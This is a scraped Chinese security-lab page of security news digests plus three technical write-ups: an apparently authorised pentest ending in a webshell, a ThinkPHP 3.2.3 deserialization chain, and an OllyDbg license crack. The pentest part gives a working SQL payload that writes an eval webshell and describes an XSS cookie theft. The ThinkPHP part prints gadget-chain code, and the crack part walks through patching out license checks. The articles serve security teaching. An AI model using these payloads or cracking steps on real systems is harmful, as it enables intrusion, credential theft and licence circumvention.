免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、AWS 的 Log4Shell 热补丁被发现严重漏洞，可导致容器逃逸和提权 https://www.securityweek.com/serious-vulnerabilities-found-awss-log4shell-hot-patches 2、CISA警告最近修补的Windows Print Spooler 漏洞已被利用 https://www.securityweek.com/organizations-warned-attacks-exploiting-recently-patched-windows-vulnerability 3、Oracle 2022 年 4 月重要更新发布 520 个新安全补丁 https://www.securityweek.com/oracle-releases-520-new-security-patches-april-2022-cpu 4、Snort Modbus预处理器中被发现一个严重DoS漏洞(CVE-2022-20685) https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-dos-9D3hJLuj 5、加密货币交易所Currency遭受分布式拒绝服务攻击 https://www.govinfosecurity.com/crypto-firm-currencycom-mitigates-ddos-attack-a-18922 6、Okta表示Lapsus$的入侵行为仅影响了两名客户 https://www.zdnet.com/article/okta-says-lapsus-breach-hit-just-two-customers/ 7、研究人员：英政府内部网络曾遭“飞马”间谍软件攻击 https://www.cnbeta.com/articles/tech/1259993.htm 8、7-Zip被爆0day漏洞：可用于本地提权和执行代码 https://www.cnbeta.com/articles/tech/1259869.htm 9、恶意信息窃取软件Inno Stealer通过虚假Windows 11升级网站进行传播 https://cyware.com/news/inno-stealer-fake-windows-11-upgrade-spreads-infostealer-74a72e5d 10、QNAP 敦促客户禁用路由器上的 UPnP 端口转发 https://www.bleepingcomputer.com/news/security/qnap-urges-customers-to-disable-upnp-port-forwarding-on-routers/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、联想发布补丁修复影响 110 多种型号笔记本电脑的 UEFI 固件严重漏洞 https://www.securityweek.com/firmware-flaws-allow-disabling-secure-boot-lenovo-laptops 2、卡巴斯基发布针对Yanluowang勒索软件的免费解密器 https://securityaffairs.co/wordpress/130369/malware/yanluowang-ransomware-free-decryptor.html 3、Pegasus 间谍软件在最近的攻击中利用了新的零点击 iPhone 漏洞 https://securityaffairs.co/wordpress/130360/malware/nso-group-pegasus-click-iphone-exploit.html 4、英国：2021-2022 年，超过 4200 万人的财务数据遭到泄露 https://www.techrepublic.com/article/over-42-million-people-in-the-uk-had-financial-data-compromised 5、专家发现一个出售被盗数据的新市场Industrial Spy https://securityaffairs.co/wordpress/130323/cyber-crime/industrial-spy-marketplace.html 6、领英成为网络钓鱼攻击中被模仿得最多的品牌 https://www.infosecurity-magazine.com/news/linkedin-impersonated-brand/ 7、SolarMarker恶意软件新变种使用新的技术逃避检测 https://thehackernews.com/2022/04/new-solarmarker-malware-variant-using.html 8、GitHub封锁了两家大型俄罗斯银行的账户 https://www.hackread.com/github-blocks-large-russian-banks-accounts-us-sanctions/ 9、金融科技平台中的SSRF漏洞或导致银行账户信息泄露 https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/ 10、索尼、尼康、Adobe和英特尔等公司成立C2PA联盟对抗"深度伪造" https://www.cnbeta.com/articles/tech/1259571.htm

一、文章前言 　本文为记录实战过程中遇到的问题及思考，旨在思路分享及自我总结。文中涉及目标站点为SRC授权站点，为防止漏打码已对实际链接进行了部分删减，如去除了链接目录名等。整个测试过程涉及未授权访问、暴力破解、存储型XSS、SQL注入，到最后拿shell，过程略微曲折。 　PS：截至投稿前，已将漏洞提交厂商并验证其已完成修复。  　二、信息收集 　打开目标站点，为系统登录界面。安装VNC远程协助链接到内网地址，经测试登录无验证码及失败次数锁定，可尝试暴力破解，此处先做信息收集。   　目标站点：http://1.2.3.4/login.aspx 　脚本：aspx,通过登录页面可知； 　服务器：IIS7.5，通过404、403报错页面可得； 　数据库：可能为SQL Server，常见组合； 　安全防护：未知，对IP进行端口扫描会封一段时间，但测试and 1=1不拦，无WAF或未开启严格的防护策略； 　通过查看返回包，发现Server为nginx/1.17.2，判断应该存在反向代理。  　三、暴力破解 　通过对现有信息的分析，优先选择暴力破解，系统首页登录为密码md5前端加密后传输，此处爆破需选择burp的HASH-MD5后进行爆破。 　系统登录失败返回信息都为“登录失败xxx”，无法确认是否存在用户。   　查看页面源码发现存在http://1.2.3.4/client/  　此页面未对密码进行md5加密，即 　首页：http://1.2.3.4/ 密码加密后传输 　Client：http://1.2.3.4/client/ 密码明文传输    　此处用http://1.2.3.4/client/ 进行爆破，不需要进行MD5加密可提高效率，但使用name500及自定义字典，包括常见测试账号，及3位数字，4位数字，5位数字等组成5000多个用户名，爆破密码123456、888888、111111，结果一个都没爆破到。 　当时的思路是先确定用户名，例如工号等，再去爆破其中存在弱口令的账号，并未想着直接爆破admin，因为那时觉得后台可能不在这里登录，现在想想也可以直接盲爆admin用户。 　所以那时先收集用户名，使用Google语法，Site：xxx 工号，但并没有收获。针对只有登录界面的系统，只有掌握了用户名的规律，才能提高爆破的机率，此处很有可能是工号。用户名收集无果，便打开了目录扫描，看看有无敏感信息。 　四、未授权访问 　通过对站点进行目录扫描，存在以下目录及文件。 　逐一进行访问： 　css.aspx访问弹出登陆超时，跳转登陆界面，禁用js访问空白； 　reg.aspx访问为软件注册页面；   　main.aspx访问弹登陆超时，跳转登陆界面，禁用js返回页面如下：   　查看源码，发现存在main_d.aspx如下：   　禁用js访问main_d.aspx返回以下页面：   　继续查看源码，发现以下地址。   　禁用js访问http://1.2.3.4/MyWork/Richeng/RichengmyList_show.aspx?id=12 　点击修改，此处已测试id不存在SQL注入。    　该页面存在大量附件，其中有体检附件登记表，点击下载链接如下：   　点击下载跳转登陆界面   　此处感觉是有任意文件下载，但可能需要登录，后续爆破出账户后可测试。 　http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls 　需下载文件，尝试构造http://1.2.3.4/file/liaotian/201922xx.xls      　如上获取到该单位的员工工号，使用excel生成工号列表进行暴力破解。 　五、登录系统 　上述已获取工号组合，生成01111-05555进行爆破，使用密码123456、111111、888888、123qwe、qwe123、123123、123321。 　当使用密码123321时，成功爆破出一个弱口令用户。   　使用该账号登录系统   　系统功能模块较多，测试前面的文件下载 　http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls   　尝试下载web.config 　http://1.2.3.4/file_down.aspx?number=web.config   　测试不存在任意文件下载，修改文件后是直接Location到文件,从而下载， 　后续对系统的功能点逐个进行测试。 　六、文件上传 　后台功能主要存在以下4个上传点。 　上传点1-印章上传：   　上传点2-邮件附件：   　上传点3-头像上传：   　上传点4：KindEditor 4.1.10 编辑器，貌似无解。 　上传点1，文件上传后的路径为：/seal/2021815238.png 　此目录未限制禁止脚本执行，但无法上传脚本文件，尝试绕过均失败。    　上传点2，文件上传后的路径为:/file/emailfile/2021081523.png 　此目录限制了脚本执行，即/file目录下不能执行脚本文件。 　此上传点可上传aspx等文件，但上传后后缀为.unknow 　后续通过注入点发现上传后缀写在数据库中，可以通过update语句增加后缀，但并无跨目录的方法，即使上传了aspx脚本文件，也无法执行。 　上传文件后截图如下：   　后续查看数据库，允许上传的文件后缀如下： 　上传点3，任意文件上传，上传后路径为/SystemManage/User/file/ 下 　测试目录限制脚本执行，无法跨目录。   　七、存储型XSS 　上面针对后台上传功能测试后无法上传getshell，便考虑是否能找到高权限账号，管理员账号可能有修改上传文件格式的权限。 　此时测试邮件存在存储型XSS，发送邮件可以打用户cookie。 　发送邮件给自己，收件箱打开时：   　可以给管理员发送带XSS的邮件，当管理员打开邮件时，即可以获取管理员的cookie，此处配合server酱，可实现获取cookie后微信提醒通知，同样发送邮件给自己测试。 　编写邮件，插入XSS平台payload。   　收件箱点开后   　微信收到Server酱通知    　登录XSS平台查看，成功获取用户cookie信息   　此处构造好XSS后，给管理员发送了标题为【问题建议】的邮件，增加管理员打开的概率，即打开邮件可获取管理员的cookie。 　同时在邮件选择收件人处，发现组织架构处，可列举所有用户的工号、科室、姓名信息。 　故可以收集用户工号，此处发现管理员即为admin，在等待xss的同时，也构造字典对admin进行爆破。 　然后竟然成功爆破出了admin的密码，看了下密码在“全国弱口令TOP1000”中没有，如果一开始就爆破admin，可能也爆不出来，个人习惯是爆TOP1000，当初也确定不了管理员就是admin。 　此处也说明有一个强字典是多么的重要。   　使用admin登录系统后，只多了以下两个功能模块，很失望并没有可以修改上传设置的功能。 　测试发现登录管理员也并没啥用，还是无法getshell，既然上传无门，那就寻找注入点，如果是sa的注入点则getshell的机率大很多。 　八、SQL注入 　于是又重新回到后台各个功能点进行测试，经过一番测试终于发现了一个注入点，链接如下： 　测试1=1页面正常   　测试1=2页面异常   　爆数据库版本信息   　如上确认存在SQL注入，使用sqlmap进行利用，当前用户为SA。   　测试使用—os-shell命令失败，可能是有安全设备拦截。  　此时也对数据库的大致表进行查看，发现了管理后台某个点的文件上传格式可在数据库设置后缀，但无法跨目录，故即使能上传脚本也无法getshell。 　九、GetShell 　经手工测试注入点支持堆叠注入，此处尝试使用sp_oacreate写马，SQL如下: 　declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'c:\shell.asp',1;EXEC sp_oamethod  @f,'WriteLine',null,'<%eval request("cmd")%>' 　但需知道网站根目录，此处可以使用xp_dirtree进行目录遍历，SQL如下： 　create table dirs(subdirectory varchar(255),depth int, filee int); 　insert dirs exec xp_dirtree 'c:\',1,1 　建立表后，先执行以下查询，此处为查询c盘目录下的文件夹及文件： 　http://1.2.3.4/WorkFlow/AddWorkFlow_add_Next.aspx?tmp=0.8307731177113578&add=&UpNodeNum=11,&FlowNumber=20189139012187&&&';insert dirs exec xp_dirtree 'c:\',1,1;--&FormId=86&Number=202181414   　页面返回正常，则语句执行成功，再去sqlmap查询dirs表下的内容，即为c盘的目录内容：   　利用上述方式成功找到网站根目录为d:\OA\ 下。 　执行SQL语句写入文件shell.asp 　declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'d:\OA\shell.asp',1;EXEC sp_oamethod  @f,'WriteLine',null,'<%eval request("cmd")%>' 　打开链接：http://1.2.3.4/shell.asp 空白，中国菜刀连接成功。   　上传冰蝎，后续可以进行socks代理，从而进入内网。   　通过systeminfo收集系统信息，可用于后续提权。   　以上成功获得目标站点shell。  　十、总结 　渗透测试很多时候需要的细心和耐心再加上一点运气，当我们在后台无法getshell时，可以尝试去找后台的SQL注入，高权限的注入点可以直接写shell。 又或者当我们有一个SQL注入点却没法写shell时，可以尝试读管理员账号密码，登录后台测试是否有文件上传漏洞，从而进行拿shell。关注不同的漏洞危害，并进行组合利用，往往可以达到出其不意的效果。 　至此全篇完，感谢阅读，希望您能从中有所收获。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Juniper修复了多个Contrail 和 Junos OS 中的严重漏洞 https://www.securityweek.com/juniper-networks-patches-vulnerabilities-contrail-networking-junos-os 2、Lazarus Group 针对韩国的化工行业 https://cyware.com/news/lazarus-eyes-chemical-sector-in-south-korea-f26c757a 3、Nozomi Networks Labs 研究人员发现新的 BotenaGo 变种 https://securityboulevard.com/2022/04/new-botenago-variant-discovered-by-nozomi-networks-labs 4、Lakeview Loan Service 遭数据泄露，影响 250 万用户 https://www.nationalmortgagenews.com/news/mortgage-servicer-reveals-data-breach-affecting-2-5-million-users 5、研究人员分享了对PYSA勒索软件组织的深入分析 https://thehackernews.com/2022/04/researchers-share-in-depth-analysis-of.html 6、Beanstalk Farms遭受网络攻击损失了1.8亿美元 https://cryptopotato.com/beanstalk-farms-lost-180m-in-flash-loan-attack-hacker-donates-250k-usdc-to-ukraine 7、 2022 年初以来，谷歌修复了Chrome 中的第三个0day漏洞 https://securityaffairs.co/wordpress/130213/security/google-chrome-zeroday-cve-2022-1364.html 8、PrivateBin修复了其XSS漏洞 https://portswigger.net/daily-swig/xss-vulnerability-in-open-source-tool-privatebin-patched 9、ZLoader C2 服务器在全球运营中中断 https://cyware.com/news/zloader-c2-servers-disrupted-in-global-operation-8763d42f 10、Windows RPC CVE-2022-26809 漏洞引起了安全研究人员的关注 https://www.bleepingcomputer.com/news/microsoft/critical-windows-rpc-cve-2022-26809-flaw-raises-concerns-patch-now/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、GitHub 称黑客使用被盗的 OAuth 访问令牌入侵了数十个组织 https://thehackernews.com/2022/04/github-says-hackers-breach-dozens-of.html 2、Conti Ransomware Gang 声称对 Nordex 黑客事件负责 https://securityaffairs.co/wordpress/130238/cyber-crime/conti-ransomware-claims-nordex-attack.html 3、Haskers Gang 将 ZingoStealer 恶意软件免费分享给同行 https://thehackernews.com/2022/04/haskers-gang-gives-away-zingostealer.html 4、新的"Enemybot"DDoS 僵尸网络以路由器、Web 服务器为目标 https://www.securityweek.com/new-enemybot-ddos-botnet-targets-routers-web-servers 5、研究人员发现NFT市场Rarible漏洞可导致用户NFT被盗 https://therecord.media/researchers-find-vulnerability-in-rarible-nft-platform/ 6、Conti勒索软件和Karakurt数据勒索组织存在联系 https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/ 7、VMWare修复了其Cloud Director产品中一个高危漏洞 https://www.securityweek.com/critical-code-execution-flaw-haunts-vmware-cloud-director 8、网络钓鱼活动利用SMS向T-Mobile客户发送恶意链接 https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/ 9、西班牙皇家足球协会的电子邮件帐户和文件被盗 https://www.espn.in/football/spain-esp/story/4642921/spanish-fa-report-cyber-attack-to-police-after-email-accounts-private-texts-stolen 10、研究表明多个会议应用在用户按下禁麦按钮后仍然在监听 https://www.bleepingcomputer.com/news/security/mute-button-in-conferencing-apps-may-not-actually-mute-your-mic/

前言 　目前官方已经不再维护ThinkPHP3.2.3，本文仅对ThinkPHP3.2.3反序列化链子进行复现，如有纰漏，还望指正。 　环境介绍 MAMP pro PhpStorm Xdebug 　利用条件 具备反序列化入口 　分析过程 　首先在分析前，先新建一个控制器，写一个反序列化入口 　在Application/Home/Controller/HelloController.class.php中新建以下内容： <?php namespace Home\Controller; use Think\Controller; class HelloController extends Controller {    public function index($Lxxx){        echo base64_decode($Lxxx);        $a = unserialize(base64_decode($Lxxx));   } } 　反序列化入口自己创建好了，接下来新建一个开始找反序列化链头，因为大多数反序列化漏洞，都是由__destruct()魔术方法引起的，因此全局搜索public function __destruct() 　分析一下不可用入口： 　例如，像上方这种，就没有可控参数，就不是很好利用 　通常，在寻找__destruct()可用的魔术方法需遵循“可控变量尽可能多”的原则 　因此在ThinkPHP/Library/Think/Image/Driver/Imagick.class.php文件中，找到具有可控变量的析构函数方法： 　如果我们对img属性赋一个对象，那么它会调用destroy()方法，这时，我们全局搜索具有destroy()方法的类，这里有一个坑点，就是在PHP7版本中，如果调用一个含参数的方法，却不传入参数时，ThinkPHP会报错，而在PHP5版本中不会报错 　而我们全局搜索的结果如下： 　在ThinkPHP/Library/Think/Model.class.php中，destroy()方法有两个可控参数，调用的是delete方法，同样，类可控，delete方法的参数看似可控，其实不可控，因为下方全局搜索后，delete方法需要的参数大多数都为array形式，而上方传入的是$this->sessionName.$sessID，即使$this->sesionName设置为数组array，但是$sessID如果为空值，在PHP中，用.连接符连接，得到的结果为字符串array。 <?php $a = array("123"=>"123"); var_dump($a.""); ?> string(5) "Array" 　接下来全局搜索delete方法 　如果能够满足红色方框前面的条件，那么我们期望能调用红色方框中的delete方法 　上面分析了这么多了，保险起见，我们这边还是先在这个文件下，echo一个值，然后将前面分析的链子整合一下，进行反序列化，看看调用过程是否正确。 　前面一共涉及到三个类，我们在Model.class.php中打印一个值，构造这三个类序列化字符串如下： <?php namespace Think\Image\Driver{ use Think\Session\Driver\Memcache; class Imagick{ private $img; public function __construct(){ $this->img = new Memcache(); } } } namespace Think\Session\Driver{ use Think\Model; class Memcache{ protected $handle = null; public function __construct(){ $this->handle = new Model(); } } } namespace Think{ class Model{ } } namespace{ $a = new Think\Image\Driver\Imagick(); echo base64_encode(serialize($a)); } 　输出： TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjA6e319fQ== 　传给浏览器后，我们可以看到Lxxx被成功的打印了出来 　也就是说截止目前，我们的分析还没有问题，那接着往下分析： 　在ThinkPHP/Library/Think/Model.class.php中，$this->data可控，我们期望进入下方的return语句中，因为此时如果我们对$this->data传入，则该方法的option参数变相可控 接着看这个方法，往下看，看看是否有可控的点 　上方红框的位置$this->db我们可控，delete方法也可控，option值上面说了，变相可控 　那么我们就可以继续搜索delete方法，注意，这个时候搜索delete方法和上面就不一样的了，之前delete方法参数不可控，此时可控了。 　在ThinkPHP/Library/Think/Db/Driver.class.php文件中，可能存在SQL注入的点，我们跟进看一看。 　下方的sql语句可能存在注入 　这里直接对table进行拼接，上方有一个parseTable方法，跟进看一下，看看是否存在过滤。 　可以看到，这里parseTable方法只是调用了parseKey方法，再跟进parseKey方法 　parseKey方法没有过滤，直接将传入的参数返回，下方红框处就是执行sql的地方了，在执行之前可以将sql打印出来，方便调试 　这么一来就可以构造链子了 <?php namespace Think\Image\Driver{ use Think\Session\Driver\Memcache; class Imagick{ private $img; public function __construct(){ $this->img = new Memcache(); } } } namespace Think\Session\Driver{ use Think\Model; class Memcache{ protected $handle = null; public function __construct(){ $this->handle = new Model(); } } } namespace Think{ use Think\Db\Driver\Mysql; class Model{ protected $pk; protected $db; protected $data = array(); public function __construct(){ $this->db = new Mysql(); $this->pk = "id"; $this->data[$this->pk] = array(                "table" => "mysql.user where 0 or updatexml(1,concat(0x7e,database()),1)#",                "where" => "1=1"           ); } } } namespace Think\Db\Driver{ class Mysql{        protected $config = array(            "debug"    => 1,            "database" => "tp323",            "hostname" => "127.0.0.1",            "hostport" => "8889",            "charset"  => "utf8",            "username" => "root",            "password" => "root"       ); } } namespace{ $a = new Think\Image\Driver\Imagick(); echo base64_encode(serialize($a)); } 　得到结果： TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjM6e3M6NToiACoAcGsiO3M6MjoiaWQiO3M6NToiACoAZGIiO086MjE6IlRoaW5rXERiXERyaXZlclxNeXNxbCI6MTp7czo5OiIA 　后记 　多断点，多打印，多跟进，多思考。 　推荐实验：PHP反序列化漏洞实验（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ce=e5cce319-525a-43ed-befd-b1c399060a5b>>

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Elementor 插件的严重漏洞影响数百万 WordPress 网站 https://www.securityweek.com/critical-vulnerability-elementor-plugin-impacts-millions-wordpress-sites2、思科修补了WLAN 控制器中的严重漏洞 https://www.securityweek.com/cisco-patches-critical-vulnerability-wireless-lan-controller3、微软已采取法律和技术措施拆除 Zloader 僵尸网络 https://securityaffairs.co/wordpress/130181/malware/microsoft-disrupts-zloader-malware-infrastructure.html4、基于恶意软件的网络钓鱼活动以非洲银行业为目标 https://portswigger.net/daily-swig/african-banking-sector-targeted-by-malware-based-phishing-campaign5、美政府表示6亿美金Ronin Validator盗窃案与Lazarus Group有关 https://www.securityweek.com/us-gov-blames-north-korea-hackers-600m-cryptocurrency-heist6、Lazarus 瞄准化工行业 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical7、研究人员发现针对韩国人的类似于“Kitty 网络钓鱼行动”的活动 https://cyware.com/news/campaign-similar-to-operation-kitty-phishing-found-targeting-south-koreans-95e317d78、新的 EnemyBot DDoS 僵尸网络借用 Mirai 和 Gafgyt 的漏洞利用代码 https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html9、关键的 VMware Workspace ONE漏洞被广泛利用 https://securityaffairs.co/wordpress/130188/hacking/vmware-workspace-one-access-flaw-attacks.html10、以色列监控软件被用来监视欧盟官员 https://securityaffairs.co/wordpress/130139/malware/eu-officials-surveillance-software.html

0x1 　刚打开就显示 有新版 然后自动退出了 说明有更新了现在这个不能用了 拉进od开整 　因为有弹窗，通过弹窗下手，MessageBoxA直接下断 　成功断下，观看堆栈，发现传入进来的值就是提示新版 　一路f8 走出来走到用户层 可以发现这个call就是提示更新的 然后下面这个就是退出call 　我们直接nop掉 然后直接运行起来 　发现成功运行起来，提示更新就被我们干掉了 　点击登录显示你未充值到期 假的卡号肯定没用 我们直接搜索字符串 　点E 然后进去401000基地址来查询字符串 　发现了 原来是用了天盾网络验证 这里就好办了 这里做一个小知识 　解决天盾网络验证分为4个步骤 　1.判断登录 　2.判断合法 　3.判断算法 　4.判断时间 　我们一步一步解决掉他们 　先是找到登录中跳转过去 　直接这里的每一个call都用回车进去查看 　像这种 FF25这种就是自带函数 而不是人自定义的 　往下翻找到这个函数 应该就是登录判断函数 　直接改变判断 然后跳转出来 　找到合法 　直接retn返回不进行判断 　查找时间-1 　进行更改时间 注意不要超出这个00 不然就是改变代码 　找到算法识别跳转 一直往下翻到红色算法区域结束 第一个jnz判断的位置 　直接改成jmp 　往下翻再把jge改成jmp 　0x2 　这时候我以为已经成功了，但是直接闪退退出了。发现可能有暗桩或其他判断 　一直单步跟进到这里，发现在这里闪退了 　进去一看发现又进行了一次合法判断，直接改成retn返回 　0x3 　破解成功 　0x4 　破解成功后发现，里面的功能无法运行，感觉没有完全破解完，后又发现往路径里填写了一个key.txt 　里面填了一个也不知道什么用的数字，重新回去调试 　0x5 　搜索字符串发现确实有这个key.txt 但是不知道做了什么 　往上走发现 有一个判断跳过了这个key.txt 　直接尝试nop掉这个判断，功能最终成功运行。 　0x6总结 　1.天盾校验就是这么一个过程或者大多数的网络校验都是如此，只需要一直调试。 　2.发现有暗桩不要害怕，能断下单步调试，有耐心就能找到。 　3.发现破解了还是不能运行，不要着急，仔细观察软件还做了什么，大胆尝试，猜测，改变。 　推荐实验：Ollydbg之程序破解（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ce=b0b6e03f-a3cb-4f5c-9a98-272e2f4ee593>>

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、VMWare 确认 Workspace One 漏洞正在被广泛利用 https://www.securityweek.com/vmware-confirms-workspace-one-exploits-wild2、ABB 网络接口模块的缺陷可导致工业系统面临 DoS 攻击 https://www.securityweek.com/flaws-abb-network-interface-modules-expose-industrial-systems-dos-attacks3、Citrix 修补了多个产品中的漏洞 https://www.securityweek.com/citrix-patches-vulnerabilities-several-products4、Apache 解决了Struts 的一个严重RCE漏洞（CVE-2021-31805） https://securityaffairs.co/wordpress/130173/security/critical-apache-struts-rce-flaw.html5、 研究人员发现影响医院使用的Aethon TUG 自主移动机器人5个漏洞 https://securityaffairs.co/wordpress/130157/security/jekyllbot5-flaws-tug-autonomous-mobile-robots.html6、LockBit勒索软件潜伏在美国政府网络中数月 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-lurked-in-a-us-gov-network-for-months/7、Keksec Hacker Group 部署的新 Enemybot DDoS 僵尸网络 https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet8、西门子、施耐德修复了多个关键漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-fix-several-critical-vulnerabilities9、严重的 HP Teradici PCoIP 漏洞影响 1500 万个终端 https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints10、Industroyer2 恶意软件针对乌克兰能源部门 https://cyware.com/news/industroyer2-found-targeting-energy-sector-in-ukraine-20a5aff4

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软周二补丁日修复了 128 个 Windows 漏洞，包括一个0day漏洞 https://www.securityweek.com/microsoft-patches-128-windows-flaws-new-zero-day-reported-nsa 2、TOURNIQUET 行动，暗网市场 RaidForums 被关闭 https://securityaffairs.co/wordpress/130131/deep-web/authorities-shut-down-raidforums.html 3、NGINX 项目维护者修复了 LDAP 认证模块中的0day漏洞 https://securityaffairs.co/wordpress/130117/hacking/nginx-ldap-reference-implementation-bug.html 4、Hashnode 博客平台报告的严重 LFI 漏洞 https://thehackernews.com/2022/04/critical-lfi-vulnerability-reported-in.html 5、松下的加拿大业务遭受勒索软件攻击 https://techcrunch.com/2022/04/11/panasonic-canada-ransomware/ 6、Chrome 100 更新补丁修复高危漏洞 https://www.securityweek.com/chrome-100-update-patches-high-severity-vulnerabilities 7、恶意Web重定向服务感染16500个站点以分发恶意软件 https://thehackernews.com/2022/04/over-16500-sites-hacked-to-distribute.html 8、Android银行木马Fakecalls可拦截客户对银行的呼叫 https://www.bleepingcomputer.com/news/security/android-banking-malware-intercepts-calls-to-customer-support/ 9、AWS RDS的本地文件读取漏洞导致内部AWS服务凭证泄露 https://securityboulevard.com/2022/04/aws-rds-vulnerability-leads-to-aws-internal-service-credentials/ 10、恶意软件Qbot启用新的Windows安装程序感染载体 https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/